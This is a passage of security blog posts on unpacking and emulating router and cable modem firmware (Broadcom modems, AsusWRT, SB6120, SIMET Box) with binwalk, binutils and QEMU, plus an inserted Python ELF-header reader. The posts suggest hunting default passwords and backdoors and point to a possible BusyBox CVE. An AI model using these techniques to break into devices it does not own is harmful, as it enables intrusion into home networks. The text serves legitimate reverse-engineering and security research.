<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_-Tok3Kj_dJtKSwEUlRt7lgFAVdagvq-eNe8slMPJ9E1GWh52NSfqDMI-kaOjBNeoM3HnaygXnxxa-WRHlCOQ3mkKZMP70OfpBNiC6VsAF6Re6pefDf3uXOieMP7f3k8mxTLUpjePWBO/s1600/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_-Tok3Kj_dJtKSwEUlRt7lgFAVdagvq-eNe8slMPJ9E1GWh52NSfqDMI-kaOjBNeoM3HnaygXnxxa-WRHlCOQ3mkKZMP70OfpBNiC6VsAF6Re6pefDf3uXOieMP7f3k8mxTLUpjePWBO/s640/screenshot.png" height="394" width="640" /></a></div>
<br />
The data was extracted successfully and contains 21982740 bytes. If we replace the uncompressed size in the LZMA header with the correct value in little endian (14 6E 4F 01 00 00 00 00), the 7zr tool will no longer complain about the file integrity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzjTgcQXb4kKLWRs0W9REKk3OLIbucq1_WKrewnTeTAZKgfpjGMZcr1qhsr6NxxpwZwMq8IQrjS72ssL3SK4tGSgbyNV0b88SxQ7S7MWr5Cb1FuMp5Yd9GHOvLyaeIlD1EZ-B9Yi3jviA/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzjTgcQXb4kKLWRs0W9REKk3OLIbucq1_WKrewnTeTAZKgfpjGMZcr1qhsr6NxxpwZwMq8IQrjS72ssL3SK4tGSgbyNV0b88SxQ7S7MWr5Cb1FuMp5Yd9GHOvLyaeIlD1EZ-B9Yi3jviA/s640/screenshot2.png" height="469" width="640" /></a></div>
<br />
Most Broadcom cable modems are packed this way, including the ones manufactured by different vendors. The script was fully tested and works fine for the following models:<br />
<br />
- Cisco DPC3925, DPC2434<br />
- Motorola SB5100, SB5101, SVG6582, SVG1202<br />
- Thomson ACG905, DCM425, DHG534, DHG544, DWG850, DWG874<br />
- Webstar DPC2203<br />
<br />
<b>Firmware Analysis</b><br />
<br />
Now that you've successfully unpacked the firmware, here are a couple of cool things you can do:<br />
<br />
- Find default passwords<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeu0dE1rGikrpgSm8d7VysB8MbKUxdfXeDH30m6VL58_uVIERZNEGws_DSMlJ8T-YXUWQCydDNq7fuJdkmIFc4AG7kV-BiXy4ezhfiSTXUluDgfUVokNoQZjFQ27feqtKHX5WVOZx2Rr2/s1600/defaultpw.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeu0dE1rGikrpgSm8d7VysB8MbKUxdfXeDH30m6VL58_uVIERZNEGws_DSMlJ8T-YXUWQCydDNq7fuJdkmIFc4AG7kV-BiXy4ezhfiSTXUluDgfUVokNoQZjFQ27feqtKHX5WVOZx2Rr2/s640/defaultpw.PNG" height="288" width="640" /></a></div>
<br />
- Find backdoors<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzyshOA7jydIisUERU6D_rv0Eb_DLmOzEMv9nmrWNaqmIEm32B8iWK6p8KDhnuBnK1oafOfSWppqTjmjZU7ykAszcHV52cm0mYjhFbWKkyYnZaKEVmbtWvGo5_K-Jx3QeO_3t9mqvldS8b/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzyshOA7jydIisUERU6D_rv0Eb_DLmOzEMv9nmrWNaqmIEm32B8iWK6p8KDhnuBnK1oafOfSWppqTjmjZU7ykAszcHV52cm0mYjhFbWKkyYnZaKEVmbtWvGo5_K-Jx3QeO_3t9mqvldS8b/s640/backdoor.png" height="252" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzqjPFxbaFU6fsl5r_osBC9LIISGQAjGm8qG257p3LLIoGopsutDwOYtnILvd6XA2GSLLGxNVvfN62RFMmqIGjyPTgMbcVZBrZtjAsj94qqYKtdZ9xw4nzF_Cr5j7J-TgT6teDxfKJVud/s1600/backdoor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzqjPFxbaFU6fsl5r_osBC9LIISGQAjGm8qG257p3LLIoGopsutDwOYtnILvd6XA2GSLLGxNVvfN62RFMmqIGjyPTgMbcVZBrZtjAsj94qqYKtdZ9xw4nzF_Cr5j7J-TgT6teDxfKJVud/s640/backdoor2.png" height="344" width="640" /></a></div>
<br />
- Pentest the Web Application<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQrpcWUD7Xjd99URlRUnBK25mr4fZGALZcnICDSHt4PSOCFTAX-oGuOurmwED1cMVLxGaOzBj3C4E5C8j9i2LwRMI5ZC_o-HwR2yKEJbTl5FXNl7hlWth1tl0J90QnOPyI-29K0ozvOw0L/s1600/carving.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQrpcWUD7Xjd99URlRUnBK25mr4fZGALZcnICDSHt4PSOCFTAX-oGuOurmwED1cMVLxGaOzBj3C4E5C8j9i2LwRMI5ZC_o-HwR2yKEJbTl5FXNl7hlWth1tl0J90QnOPyI-29K0ozvOw0L/s640/carving.png" height="394" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBPk7objnf92px7Jrxtnm_RIHmVwlY3NKYgBLoc7jxC5smb78y0xv3wRtEm5s_8Ywatvm-Ux1UfK2jkdWzxWBh_QeIWqt9YMmVcHcm1gUpJmCTRPkuKZ8G9RzGs_SgsGO4Zft1GOSnN61I/s1600/carving2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBPk7objnf92px7Jrxtnm_RIHmVwlY3NKYgBLoc7jxC5smb78y0xv3wRtEm5s_8Ywatvm-Ux1UfK2jkdWzxWBh_QeIWqt9YMmVcHcm1gUpJmCTRPkuKZ8G9RzGs_SgsGO4Zft1GOSnN61I/s320/carving2.png" height="299" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAbPcz9B6zUUS5_rWir6hCfi1mC6Kn1OnxDMCQ-reC5M-FCQu6iljySX85OCcJzS16_GYtb9yhdl5LlyODQE3TdzmDHGj_pnZG7m1QoCQ0HcG4pbeRZut8z8H7-rLKdJpDTTIZ0r2ljM9z/s1600/carvin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAbPcz9B6zUUS5_rWir6hCfi1mC6Kn1OnxDMCQ-reC5M-FCQu6iljySX85OCcJzS16_GYtb9yhdl5LlyODQE3TdzmDHGj_pnZG7m1QoCQ0HcG4pbeRZut8z8H7-rLKdJpDTTIZ0r2ljM9z/s640/carvin3.png" height="250" width="640" /></a></div>
<br />
- Fingerprint your device and <a href="https://github.com/bonsaiviking/missing-os-fingerprints">submit to NMAP</a><br />
<br />
- <a href="https://community.rapid7.com/community/infosec/sonar/blog/2013/10/27/estimating-readynas-exposure-with-internet-scans">Find similar devices</a> using <a href="http://scans.io/">scans.io</a> dataset<br />
<br />
- Mail <a href="https://twitter.com/hdmoore">HD Moore</a> a copy of the firmware and wait for the <a href="https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities">CVE Spam</a><br />
<br /></div>
<br />
<b>Analyzing and Running binaries from Firmware Images - Part 1</b> (Bernardo Rodrigues, 2013-09-01)<br />
<br />
During the first part of <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box Firmware analysis</a>, we downloaded the firmware image, extracted its contents, compared and analyzed its base and found a couple of interesting files (SSH keys, binary files, init scripts, firewall rules and so on).<br />
<br />
For this part we'll focus on identifying binaries, comparing and executing them to find interesting data. Whenever you're analyzing binaries from different architectures, there are a couple of nice tools that aid debugging, reversing and emulating their behavior, like objdump, readelf and QEMU.<br />
<br />
<a href="http://www.emdebian.org/">Embedded Debian Project</a> provides pre-built binary toolchains for mips, mipsel, arm, armel, powerpc, and a couple of other architectures. In order to download and install it on Debian based Linux distros, you have to apt-get its archive signing key:<br />
<div class="code">
sudo apt-get install emdebian-archive-keyring</div>
<br />
Now you need to include their repository in your /etc/apt/sources.list:<br />
<br />
<div class="code">
deb http://www.emdebian.org/debian/ squeeze main</div>
<br />
After running apt-get update you can install binutils for your target architectures:<br />
<div class="code">
sudo apt-get install binutils-mips-linux-gnu binutils-mipsel-linux-gnu binutils-arm-linux-gnueabi</div>
<br />
For this little exercise I'll analyze three <a href="http://www.busybox.net/">busybox</a> binaries, from three different firmware images: busybox-simet (from <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box</a>), busybox-asuswrt (from <a href="https://github.com/RMerl/asuswrt-merlin">AsusWRT-Merlin firmware</a>) and busybox-sb6120 (from <a href="http://sourceforge.net/projects/sb6120.arris/">Motorola's SB6120 Surfboard cable modem</a>).<br />
<br />
<b>Architecture, Big-Endian or Little Endian?</b><br />
<br />
When analyzing SIMET Box we already knew that the device was based on the ar71xx platform, which is MIPS based and big endian, as stated on <a href="https://dev.openwrt.org/wiki/platforms">OpenWRT's official page</a>. If you want to find this out on your own you can use the file utility:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJgEE05qQWukiO-Gh7zeSqceUd3TT6uSyn4TfdL15sdIAgxxKq_sRZY74MX6wV1SnJ-0qACx8lGrWzNU8i4di39E7yJwY4444l0MhZUEOJ9cw2R-5Rfu7W8rr8m4QbvJmwRlYclcDLxso6/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJgEE05qQWukiO-Gh7zeSqceUd3TT6uSyn4TfdL15sdIAgxxKq_sRZY74MX6wV1SnJ-0qACx8lGrWzNU8i4di39E7yJwY4444l0MhZUEOJ9cw2R-5Rfu7W8rr8m4QbvJmwRlYclcDLxso6/s640/bin1.png" width="640" /></a></div>
<br />
Emdebian binutils also provide useful tools to identify further info from unknown binaries. A nice hack that I commonly use is to display information from object files using different toolchains in order to find out which one understands the file structure properly. For example, objdump -f displays contents of the overall file header.<br />
<br />
<ul>
<li>SIMET Box tl-wr740n-v4 (architecture: mips:isa32r2, file format elf32-tradbigmips)<br /></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtSXCLxijOCY12m6jRq8XcFCPJD3MHbi6bhx3ivtkIVoIepN2saz3McR8ezGh8uPpDj2GEmxFXO0TWBSFKikVlSvkXJ9jbAc8umxVo9pp5VizUzl3NCNZbqVm3SFOhW7K9HpUAV5r_hCeq/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtSXCLxijOCY12m6jRq8XcFCPJD3MHbi6bhx3ivtkIVoIepN2saz3McR8ezGh8uPpDj2GEmxFXO0TWBSFKikVlSvkXJ9jbAc8umxVo9pp5VizUzl3NCNZbqVm3SFOhW7K9HpUAV5r_hCeq/s640/bin2.png" width="640" /></a></div>
<br />
<ul>
<li>AsusWRT-Merlin v3.0.0.4.374.32 (architecture: mips:isa32 file format elf32-tradlittlemips)<br /></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTerHt8aYoG89iGIAMwpq8Sf0qP_sP6mgaQKxz16Cs2c55ygqtETPp-ekq3vdKoP66Tna4zgsF21x80y5fJFSI1mGT_ch-k3NlEn-TTQHv0dPI4u1_jaTAcUFfeiYmM5ufB_vzodKapKMw/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTerHt8aYoG89iGIAMwpq8Sf0qP_sP6mgaQKxz16Cs2c55ygqtETPp-ekq3vdKoP66Tna4zgsF21x80y5fJFSI1mGT_ch-k3NlEn-TTQHv0dPI4u1_jaTAcUFfeiYmM5ufB_vzodKapKMw/s640/bin3.png" width="640" /></a></div>
<br />
<ul>
<li>SB6120 v1.0.2.4-SCM01 (architecture: arm, file format elf32-bigarm)<br /></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS34bh2Xt96TyJTq2dKvix9ilDEQRhaPulqe-v9AGvQ6DIWdKj_ZxP6VfvVl6k65INcmup79qmibiMlNE6A_Uzbo8U2YlpKoD4Af7jvOi8o4MDjPk43GC2CroAKecBM6XBUcreUCnVOcuH/s1600/bin4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS34bh2Xt96TyJTq2dKvix9ilDEQRhaPulqe-v9AGvQ6DIWdKj_ZxP6VfvVl6k65INcmup79qmibiMlNE6A_Uzbo8U2YlpKoD4Af7jvOi8o4MDjPk43GC2CroAKecBM6XBUcreUCnVOcuH/s640/bin4.png" width="640" /></a></div>
<br />
We now know each file's format/architecture and can proceed using QEMU to emulate the binaries on a virtual environment.<br />
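To pin down the architecture and endianness without the toolchains installed, here is an added Python stand-in for the file / objdump -f / readelf -h step (this is not code from the post): it reads the ELF32 identification bytes, e_machine and the MIPS ISA bits of e_flags, and names the qemu-user-static binary the post uses for each case. The three sample headers are constructed to match what objdump -f reported for the three busybox binaries; they are bare 52-byte headers, not the real files.

```python
import struct

ELF32_HEADER = "16sHHIIIIIHHHHHH"      # e_ident .. e_shstrndx, 52 bytes
EM_NAMES = {3: "i386", 8: "mips", 20: "powerpc", 40: "arm", 62: "x86_64"}
ET_NAMES = {1: "relocatable", 2: "executable", 3: "shared object"}
# EF_MIPS_ARCH values (top nibble of e_flags) and the names objdump prints for them
MIPS_ISA = {0x00000000: "mips:isa1", 0x10000000: "mips:isa2", 0x20000000: "mips:isa3",
            0x30000000: "mips:isa4", 0x40000000: "mips:isa5", 0x50000000: "mips:isa32",
            0x60000000: "mips:isa64", 0x70000000: "mips:isa32r2", 0x80000000: "mips:isa64r2"}
# qemu-user-static binary per (machine, big-endian?)
QEMU_USER = {("mips", True): "qemu-mips-static", ("mips", False): "qemu-mipsel-static",
             ("arm", True): "qemu-armeb-static", ("arm", False): "qemu-arm-static",
             ("powerpc", True): "qemu-ppc-static", ("i386", False): "qemu-i386-static",
             ("x86_64", False): "qemu-x86_64-static"}


def inspect_elf32(blob):
    """Report type, endianness, architecture and the matching qemu user binary."""
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if blob[4] != 1:
        raise ValueError("ELFCLASS64 binaries are not handled here")
    if blob[5] not in (1, 2):
        raise ValueError("bad EI_DATA byte")
    big_endian = blob[5] == 2          # EI_DATA: 1 = LSB first, 2 = MSB first
    fields = struct.unpack_from((">" if big_endian else "<") + ELF32_HEADER, blob, 0)
    e_type, e_machine, e_flags = fields[1], fields[2], fields[7]
    machine = EM_NAMES.get(e_machine, "unknown(%d)" % e_machine)
    arch = MIPS_ISA.get(e_flags & 0xF0000000, "mips") if machine == "mips" else machine
    return {
        "type": ET_NAMES.get(e_type, "unknown"),
        "endian": "big" if big_endian else "little",
        "arch": arch,
        "qemu": QEMU_USER.get((machine, big_endian)),
    }


def make_elf32_header(big_endian, e_machine, e_flags=0, e_type=2):
    """Constructed 52-byte header (sample data only; no program or section tables)."""
    e_ident = b"\x7fELF" + bytes([1, 2 if big_endian else 1, 1, 0]) + bytes(8)
    return struct.pack((">" if big_endian else "<") + ELF32_HEADER, e_ident,
                       e_type, e_machine, 1, 0x400000, 52, 0, e_flags,
                       52, 32, 0, 40, 0, 0)


# Constructed to match what objdump -f reported for the three binaries.
SAMPLES = {
    "busybox-simet": make_elf32_header(True, 8, e_flags=0x70001001),     # mips:isa32r2, BE
    "busybox-asuswrt": make_elf32_header(False, 8, e_flags=0x50001001),  # mips:isa32, LE
    "busybox-sb6120": make_elf32_header(True, 40, e_flags=0x02000000),   # arm, BE
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        info = inspect_elf32(blob)
        print("%-16s %-13s %-6s -> run with %s"
              % (name, info["arch"], info["endian"], info["qemu"]))
```

The header alone tells you which qemu binary to copy into the chroot; it says nothing about the dynamic loader and libraries the binary needs (the ld-uClibc.so problem below), which still needs objdump -x or readelf -d on the binary.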
<br />
<b>QEMU</b><br />
<br />
QEMU is a generic and open source machine emulator and virtualizer that supports architectures like MIPS, ARM and PowerPC. In order to set up and run single binaries with QEMU on Debian based Linux distributions, you need to install the <a href="https://wiki.debian.org/QemuUserEmulation">qemu-user-static</a> package. <a href="https://twitter.com/keith55">RogueAsian</a> and <a href="https://twitter.com/devttyS0">devttys0</a> detail these steps <a href="http://milo2012.wordpress.com/2011/12/18/reversing-lifesize-220-firmware/">here</a> and <a href="http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/">here</a>.<br />
<div class="code">
sudo apt-get install qemu-user-static</div>
<br />
It's important to run qemu in a chrooted environment to avoid mixing your target's libraries with those on your host system.<br />
<br />
<b>AsusWRT-Merlin v3.0.0.4.374.32</b><br />
<br />
Let's try this on AsusWRT's busybox first. We'll have to use qemu-mipsel-static because it's MIPS32 based and Little Endian.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2o98etdVwB80e6qAXkqsLXZTHWx3Rle9gkyNFnzq_LoNHg2pHZE4ttiTQ2K926SBu6rHDOgG81gfnpY8dO0L_bti5V_gfE_Z2IwEtJKAwKh5dsBmZ9M2Aem9q9SSqKatF5qDKkPUMOzv2/s1600/qemu1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2o98etdVwB80e6qAXkqsLXZTHWx3Rle9gkyNFnzq_LoNHg2pHZE4ttiTQ2K926SBu6rHDOgG81gfnpY8dO0L_bti5V_gfE_Z2IwEtJKAwKh5dsBmZ9M2Aem9q9SSqKatF5qDKkPUMOzv2/s640/qemu1.png" width="640" /></a></div>
<br />
Hmmm, not so lucky this time, ld-uClibc.so is missing. Let's check the dynamic section and copy the necessary libraries from the original firmware:<br />
<div class="code">
mips-linux-gnu-objdump -x bin/busybox-asuswrt | grep lib</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcT2fP5f5oW_FxMqBLBuFKb7KAGUyRq9pu1OhokGKB7ghsb-aOIByNVPKXxGJfXss5lu9SJrpLrHi9l-oolqZVEVV9619oNDhEycswDotmIAM2hNOgyFnbVYTHujrY140SrdZeqKf7HnXI/s1600/qemu3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcT2fP5f5oW_FxMqBLBuFKb7KAGUyRq9pu1OhokGKB7ghsb-aOIByNVPKXxGJfXss5lu9SJrpLrHi9l-oolqZVEVV9619oNDhEycswDotmIAM2hNOgyFnbVYTHujrY140SrdZeqKf7HnXI/s640/qemu3.png" width="640" /></a></div>
<br />
We could also cross-compile these libraries ourselves or install the target C libraries with <a href="https://wiki.debian.org/QemuUserEmulation">dpkg-cross</a>, but using the firmware's original libraries is always preferred. After copying the necessary files, we can finally execute it using QEMU:<br />
<div class="code">
cp `whereis qemu-mipsel-static | cut -d" " -f2` .<br />
sudo chroot . ./qemu-mipsel-static bin/busybox-asuswrt</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXdFC8cIjmUQgt6rTl8Xgr2jpX0NZJcx-HlDxk_ZLdZ3_8D2a-BQw-Y-vTPYUjH6W4WZ8XM2WjJTXszCFO-wAWqwdvmyx0dv4af7KUQwLCHfGdGDTxctvWbGRFrXmEpeos5Wkvcxj-weL/s1600/qemu4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXdFC8cIjmUQgt6rTl8Xgr2jpX0NZJcx-HlDxk_ZLdZ3_8D2a-BQw-Y-vTPYUjH6W4WZ8XM2WjJTXszCFO-wAWqwdvmyx0dv4af7KUQwLCHfGdGDTxctvWbGRFrXmEpeos5Wkvcxj-weL/s640/qemu4.png" width="640" /></a></div>
<br />
<b>SB6120 v1.0.2.4-SCM01</b><br />
<br />
Let's try to run busybox from Motorola's SB6120 Surfboard cable modem (ARM/Big Endian):<br />
<br />
<div class="code">
cp `whereis qemu-armeb-static | cut -d" " -f2` .<br />
sudo chroot . ./qemu-armeb-static bin/busybox-sb6120</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXZmQnpPmZ20O6h7SWN6xSShQ0Jchvu8SxwvRJ-EFHlRwL3c-031RsRJtstO3Bwa9p49iGciqK__DkP36Bd2aFkMOqEf1___E8W90xu4640iTni8w2vJ3F0481rtvU-i3ihxZZ0nK2M6Sz/s1600/qemu5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXZmQnpPmZ20O6h7SWN6xSShQ0Jchvu8SxwvRJ-EFHlRwL3c-031RsRJtstO3Bwa9p49iGciqK__DkP36Bd2aFkMOqEf1___E8W90xu4640iTni8w2vJ3F0481rtvU-i3ihxZZ0nK2M6Sz/s640/qemu5.png" width="640" /></a></div>
<br />
BusyBox v1.4.2, might be vulnerable to CVE-2011-2716 =)<br />
<br />
<b>SIMET Box tl-wr740n-v4</b><br />
<br />
Running the busybox binary <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">extracted from SIMET Box</a> (MIPS/Big Endian):<br />
<br />
<div class="code">
cp `whereis qemu-mips-static | cut -d" " -f2` .<br />
sudo chroot . ./qemu-mips-static bin/busybox-simet<br />
mips-linux-gnu-readelf -h bin/busybox-simet</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGsle2-BagT81YpVKcpXf7rsH8Y0hKUnC7E1cv-TVWUztpB_cVet43-dWVvgkXVVPI3T5T8QgfLtj1HbT1gUxHZdDO-TZMWLQILMwEQsHPuAs3BvBZjVYFciB6cmXVLFPVVQwbKgiCUfT/s1600/qemu6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGsle2-BagT81YpVKcpXf7rsH8Y0hKUnC7E1cv-TVWUztpB_cVet43-dWVvgkXVVPI3T5T8QgfLtj1HbT1gUxHZdDO-TZMWLQILMwEQsHPuAs3BvBZjVYFciB6cmXVLFPVVQwbKgiCUfT/s640/qemu6.png" width="640" /></a></div>
<br />
Unfortunately, qemu-mips-static did not recognize the ELF image properly and was unable to run SIMET Box's binaries on the fly. In the next post I'll detail how to overcome this issue with SIMET Box's busybox by running a full OpenWRT MIPS environment on QEMU. This is useful because we can compile and run our own (compatible) kernel, set up a network device, and analyze the network activity and its system-wide interactions.<br />
<div>
<br />
<b>Conclusion</b></div>
These techniques help identify unknown binaries from unknown architectures and run them in a virtual environment. They can be useful for analyzing malware for embedded systems (<a href="http://internetcensus2012.bitbucket.org/paper.html">Internet Census 2012</a> anyone?), during forensic analysis, and for hacking and finding vulnerabilities in firmware images.<br />
<br />
<br />
<b>SIMET Box Firmware Analysis: Embedded Device Hacking & Forensics</b> (Bernardo Rodrigues, 2013-08-25)<br />
<br />
For my first blog post I decided to have a quick look at the firmware from SIMET Box. SIMET is organized by the Brazilian NIC.br in order to test and monitor Internet speed across the country. For more info (in Portuguese) visit their site <a href="http://simet.nic.br/">here</a>. All the data collected is available to the community in reports and heat maps like <a href="http://simet.ceptro.br/mapas/">this</a>.<br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The organization is now handing out free Wi-Fi routers to Brazilians in order to measure Internet quality in different regions. The SIMET Box equipment is a custom TL-WR740N pre-installed with OpenWRT. You can also download and install the standalone firmware on other TP-Link SOHO routers.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="187" src="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" width="320" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The project is quite interesting but in times of PRISM and NSA I don't like the idea of using a "black box" at home, so I decided to check its design.</span><br />
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">Firmware</span></b><br />
<span style="font-family: inherit;"><br />As I don't have the actual box, I'll analyze SIMET Box's firmware image. The firmware can be downloaded from <a href="http://simet.nic.br/firmware">http://simet.nic.br/firmware</a>. For this initial analysis I'll be using simetbox-tl-wr740n-v4.bin (MD5 d08798093e1591bece897671e96b5983).</span><br />
<span style="font-family: inherit;"><br />Let's start by using <a href="http://www.devttys0.com/">Craig Heffner's</a> <a href="https://code.google.com/p/binwalk/">binwalk</a> and <a href="https://code.google.com/p/firmware-mod-kit/">firmware-mod-kit</a> to unsquash the filesystem:</span><br />
<div class="code">
binwalk -Me simetbox-tl-wr740n-v4.bin</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbesmUahWe68tN2CuoFf0vRwFNyQX7dSQ-AT_NjVu-_oUlBEZQTdiLIFedRqudUbThN7075J7Ryou2lILy3e8Vf5aWhs3s5Dg8z2zI8pvy1K7lNyO8lbojQdhJe5OEPcTkDbqYcnxCcaa/s1600/binwalk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbesmUahWe68tN2CuoFf0vRwFNyQX7dSQ-AT_NjVu-_oUlBEZQTdiLIFedRqudUbThN7075J7Ryou2lILy3e8Vf5aWhs3s5Dg8z2zI8pvy1K7lNyO8lbojQdhJe5OEPcTkDbqYcnxCcaa/s640/binwalk.png" width="640" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">After extracting the files we can browse the squashfs-root directory and grep through it to identify the OpenWrt version the image is based on:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtyaImKPpZ6ahzP6uyVkS4g2V_mSWU5uG8iku5e5WB3e_tZWld6wrwn3IFnKt8BkFrs5P2kJ01_T0rdJxcVa7H64MHeCp9slFsVOmgus6Ph_v0IJp3iTxlFjlu2u_uqYfjkd2HbHcvoyyq/s1600/sm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtyaImKPpZ6ahzP6uyVkS4g2V_mSWU5uG8iku5e5WB3e_tZWld6wrwn3IFnKt8BkFrs5P2kJ01_T0rdJxcVa7H64MHeCp9slFsVOmgus6Ph_v0IJp3iTxlFjlu2u_uqYfjkd2HbHcvoyyq/s640/sm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">We now know that SIMET Box is based on the Attitude Adjustment branch (v12.09) for </span>Atheros AR71xx, downloadable from OpenWrt's official site: <a href="http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin">openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin</a>.</div>
<br />
<span style="font-family: inherit;">After extracting the base firmware (again with binwalk) we have two directory trees to diff. <a href="http://winmerge.org/">WinMerge</a> or <a href="http://kdiff3.sourceforge.net/">Kdiff3</a> can be used to compare the files.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
